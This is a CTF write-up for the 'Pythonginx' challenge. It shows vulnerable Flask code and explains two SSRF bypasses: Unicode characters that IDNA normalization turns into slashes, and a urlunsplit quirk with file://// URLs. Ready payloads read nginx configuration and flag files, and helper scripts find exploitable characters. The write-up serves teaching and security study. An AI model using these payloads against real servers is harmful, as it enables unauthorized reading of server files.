Unicode vulnerabilities in URLs

ring4ring

Category: ctf. Tags: Unicode vulnerabilities in URLs, Host/Split: Exploitable Antipattern, pythonnginx, buuctf

Article link: https://blog.csdn.net/weixin_44897902/article/details/103451096

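Last week I helped my roommate with a Python exam and realized just how poor my own Python is.
Clash of the titans: nginx

Intended solution: Host/Split: Exploitable Antipatterns in Unicode Normalization (see the talk of that name for details).
The source code and analysis follow: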

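from urllib import parse
from urllib.parse import urlsplit, urlunsplit
import urllib.request

from flask import Flask, request

app = Flask(__name__)


@app.route('/getUrl', methods=['GET', 'POST'])
def getUrl():
    url = request.args.get("url")  # read the url parameter from the query string
    # urlparse returns (scheme, netloc, path, params, query, fragment);
    # .hostname is the host part of netloc, lowercased and without the port
    host = parse.urlparse(url).hostname

    if host == 'suctf.cc':  # check 1: the parsed hostname must not be suctf.cc
        return "我扌 your problem? 111"
    # urlsplit returns e.g. SplitResult(scheme='https', netloc='www.baidu.com:80',
    # path='/index.html;parameters', query='name=tom', fragment='example')
    parts = list(urlsplit(url))
    host = parts[1]  # netloc (host plus optional port)
    if host == 'suctf.cc':  # check 2: the netloc must not be suctf.cc either
        return "我扌 your problem? 222 " + host
    newhost = []
    for h in host.split('.'):  # handle each dot-separated label on its own
        # encode('idna') applies IDNA processing and yields ASCII bytes;
        # decode('utf-8') turns those bytes back into a str
        newhost.append(h.encode('idna').decode('utf-8'))
    parts[1] = '.'.join(newhost)  # join the labels back into one string
    # keep only the part of the URL before the first space
    finalUrl = urlunsplit(parts).split(' ')[0]
    host = parse.urlparse(finalUrl).hostname  # check 3: third parse
    if host == 'suctf.cc':
        return urllib.request.urlopen(finalUrl, timeout=2).read()  # SSRF (server-side request forgery)
    else:
        return "我扌 your problem? 333"

if __name__ == "__main__":
    app.run(host='0.0.0.0', port=80)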

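The URL is parsed three times. The first two parses must not yield suctf.cc as the host, while the third one must; when that holds, the SSRF goes through.
The key to the challenge is how a URL containing Unicode characters gets parsed.
The explanation below follows this writeup:

https://tiaonmmn.github.io/2019/09/03/BUUOJ%E5%88%B7%E9%A2%98-Web-Pythonginx/
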
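When a URL contains Unicode characters, the host is converted to Punycode (an encoding that represents Unicode using the limited set of ASCII characters allowed in host names). Before that conversion, the Unicode characters go through IDNA processing (internationalized domain names), which includes normalization. Some Unicode characters are already turned into ordinary ASCII characters by the IDNA step, so Punycode is never applied to them. / is one of the ASCII characters that can be produced this way, and / happens to change how a URL is interpreted. For example, ℀ becomes a/c during the conversion, which cuts the URL: www.f℀ke.microsoft.com turns into www.fa/cke.microsoft.com, and the domain changes.
Unicode characters whose converted form contains / include ℀ (a/c), ℁ (a/s), ℅ (c/o) and ℆ (c/u).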
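To see which characters behave this way, a minimal sketch can scan the Basic Multilingual Plane for characters whose NFKC form contains /. It assumes that NFKC normalization (the normalization used by IDNA's nameprep step) is a fair stand-in for the full IDNA conversion; the function name chars_normalizing_to_slash is made up for illustration.

```python
import unicodedata


def chars_normalizing_to_slash(limit=0x10000):
    """Map each character below `limit` whose NFKC form contains '/' to that form."""
    found = {}
    for cp in range(limit):
        if 0xD800 <= cp <= 0xDFFF:  # skip surrogate code points
            continue
        ch = chr(cp)
        if ch == '/':  # the plain ASCII slash itself is not interesting
            continue
        norm = unicodedata.normalize('NFKC', ch)
        if '/' in norm:
            found[ch] = norm
    return found


if __name__ == '__main__':
    for ch, norm in chars_normalizing_to_slash().items():
        print(f'U+{ord(ch):04X} {ch!r} -> {norm!r}')
```

The same scan works for any other character that matters to URL parsing by swapping the character being searched for.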

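So we only need to construct suctf.c℅. In the first two parses the host never equals suctf.cc, because IDNA processing has not happened yet.
After the second check and before the third, the statement newhost.append(h.encode('idna').decode('utf-8')) performs the IDNA conversion, which turns ℅ into c/o. The original domain becomes suctf.cc/o, so the check is bypassed and the SSRF succeeds.
Next comes reading a file, using file://. To produce a usable path, ℆ is used here, since it expands to c/u and supplies the start of /usr.
So the payload is: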
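The per-label conversion can be tried in isolation. The sketch below copies the loop from the challenge source into a helper (the name idna_per_label is hypothetical) and applies it to the host string only. It deliberately avoids urlsplit, because Python releases patched for CVE-2019-9636 raise ValueError for a netloc that changes under NFKC normalization.

```python
def idna_per_label(host):
    """Apply the same per-label IDNA round trip as the challenge code."""
    return '.'.join(
        label.encode('idna').decode('utf-8') for label in host.split('.')
    )


raw_host = 'suctf.c℅'
converted = idna_per_label(raw_host)

print(raw_host == 'suctf.cc')  # the string compared by the first two checks
print(converted)               # the host string after the IDNA step
```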

file://suctf.c℆sr/local/nginx/conf/nginx.conf

The URL that is actually requested is therefore file://suctf.cc/usr/local/nginx/conf/nginx.conf, which successfully reads the nginx configuration file.
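As a rough check of that claim, the sketch below replays the server's reassembly on the payload. It is an approximation under stated assumptions: the payload is split by hand instead of with urlsplit (patched Python versions reject this netloc with ValueError), and the helper name rebuild_like_server is invented for illustration.

```python
from urllib.parse import urlparse, urlunsplit


def rebuild_like_server(scheme, netloc, path):
    """IDNA-convert each host label, then reassemble the URL as the server does."""
    labels = [label.encode('idna').decode('utf-8') for label in netloc.split('.')]
    return urlunsplit([scheme, '.'.join(labels), path, '', ''])


payload = 'file://suctf.c℆sr/local/nginx/conf/nginx.conf'

# Manual split: everything up to the first '/' after '://' is the netloc.
scheme, rest = payload.split('://', 1)
netloc, sep, tail = rest.partition('/')

final_url = rebuild_like_server(scheme, netloc, sep + tail)
final_host = urlparse(final_url).hostname  # what the third check compares

print(final_url)
print(final_host)
```

The manual split stands in for the first two parses only; on an unpatched interpreter urlsplit would return the same netloc.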
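As a supplementary note, the usual nginx paths are:


    Configuration directory: /etc/nginx
    Main configuration file: /etc/nginx/conf/nginx.conf
    Service management script: /usr/lib64/systemd/system/nginx.service
    Modules: /usr/lib64/nginx/modules
    Executable: /usr/sbin/nginx
    Default web root: /usr/share/nginx/html
    Default log directory: /var/log/nginx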

Further reference:

https://www.jianshu.com/p/e64539590865

Page response:
[Screenshot of the page response]
After that, simply read the flag in the same way.

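Unintended solution:
Here the experts focused on urlsplit and its inverse, urlunsplit.
For example:

#url='http://www.baidu.com/s?wd=python&username=abc#1'

Splitting it gives:
SplitResult(scheme='http', netloc='www.baidu.com', path='/s', query='wd=python&username=abc', fragment='1')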

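def urlunsplit(components):
    scheme, netloc, url, query, fragment, _coerce_result = (
                                          _coerce_args(*components))  # unpack the five components
    # Runs when netloc is non-empty, or when the scheme is in uses_netloc and
    # the path does not already start with '//'. Note that url here is really the path.
    if netloc or (scheme and scheme in uses_netloc and url[:2] != '//'):
        if url and url[:1] != '/': url = '/' + url
        url = '//' + (netloc or '') + url
    # Nothing here requires netloc to be non-empty, so file:////abc slips through:
    # scheme is file and url (the path) is //abc
    if scheme:
        url = scheme + ':' + url
    if query:
        url = url + '?' + query
    if fragment:
        url = url + '#' + fragment
    return _coerce_result(url)

The if scheme branch places no requirement on netloc. So suppose we pass in

file:////abc

When this URL goes through parse.urlparse, netloc (the host in the challenge) is empty and path is //abc. Inside urlunsplit, netloc is empty and the path already starts with //, so the first block is skipped. The scheme is file, so the second block runs, and the reassembled URL becomes file://abc, in which abc is now the host.
So the payload is:

file:////suctf.cc/usr/fffffflag

On the first parse the host is empty, on the second it is still empty, and after reassembly the third parse sees suctf.cc.
Test code:

from urllib.parse import urlsplit, urlunsplit

url = "file:////abc"
parts = urlsplit(url)
print(parts)  # netloc is empty and path is '//abc'

# With the urlunsplit shown above this rebuilds to file://abc;
# newer Python releases may rebuild the URL differently.
url2 = urlunsplit(parts)
parts2 = urlsplit(url2)

print(parts2)  # with the urlunsplit shown above, netloc is now 'abc'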
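Because the standard library's urlunsplit may differ between Python releases, the sketch below re-implements the logic quoted earlier as a local function (legacy_urlunsplit, a name made up here) so the behaviour can be checked regardless of interpreter version. It assumes the quoted source is what the challenge server ran. The quoted logic only skips its first branch when the path starts with //, which is why the sketch uses a URL of the form file:////host/path; a URL such as file:abc takes the first branch instead and comes back as file:///abc, still with an empty host.

```python
from urllib.parse import urlsplit, uses_netloc


def legacy_urlunsplit(parts):
    """Local copy of the urlunsplit logic quoted in this article."""
    scheme, netloc, path, query, fragment = parts
    url = path
    if netloc or (scheme and scheme in uses_netloc and url[:2] != '//'):
        if url and url[:1] != '/':
            url = '/' + url
        url = '//' + (netloc or '') + url
    if scheme:
        url = scheme + ':' + url
    if query:
        url = url + '?' + query
    if fragment:
        url = url + '#' + fragment
    return url


parts = urlsplit('file:////suctf.cc/usr/fffffflag')
rebuilt = legacy_urlunsplit(parts)

print(repr(parts.netloc), parts.path)  # what checks 1 and 2 look at
print(rebuilt)                         # URL handed to the third parse
print(urlsplit(rebuilt).hostname)      # host seen by check 3
```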